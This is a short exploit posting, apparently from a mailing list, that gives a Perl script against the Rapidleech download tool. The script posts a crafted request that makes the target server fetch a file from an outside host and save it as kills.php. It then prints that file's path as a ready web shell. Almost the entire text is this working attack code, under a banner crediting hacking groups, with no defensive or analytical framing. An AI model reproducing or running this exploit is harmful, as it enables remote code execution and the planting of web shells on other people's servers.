Author : CSD Software : Rapidleech Company : Rapidleech Bug : Remote Code execute Exploit : #/usr/bin/perl use IO::Socket; $ha=$ARGV[0]; $pa=$ARGV[1]; $file="kills.php"; if (!$ARGV[1]) { print"\n"; print "[+] Coded By Nightmare Red_Dragon or H3CT0R3 [+]\n"; print "[+] Bug Discovered By Dark L0rD [+]\n"; print "[+] Black Hats of Mafia Hacking Team [+]\n"; print "[+] KAYVANIRAN IT AND SECURITY TEAM [+] \n"; print "[+] RapidLeech [+] \n"; print "[+] Black 0ut Frenzy Team [+] \n"; print "[+] OnHackerline WhiteHatTeam [+] \n"; print "[+] Persian site: http://www.onhackerline.ir/ [+] \n"; print "[+] English site: http://www.onhackerline.com/ [+] \n"; print"\n"; print "ex : www.ex.com /path/\n"; exit; } $sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$ha",PeerPort=>"80") || die "[-] Unable to retrieve: $!"; $sendurl = "FileName=".$file."&host=www.edseek.org&path=%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt&referer=http%3A%2F%2Fwww.edseek.org%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt&uuid=&email=&partSize=&method=tc&proxy=&saveto=./&link=http%3A%2F%2Fwww.edseek.org%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt"; $sendlen = length($sendurl); print $sock "POST ".$pa."/index.php HTTP/1.1\n"; print $sock "Host: ".$ha."\n"; print $sock "Connection: close\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Content-Length: ".$sendlen."\n\n"; print $sock $sendurl; print "Creating Shell...Plz W8\n\n"; while($recvd = <$sock>) { print " ".$recvd.""; } print "shell: ".$ha.$pa.$file; ____________________________________________________________________________________ Yahoo! Music Unlimited Access over 1 million songs. http://music.yahoo.com/unlimited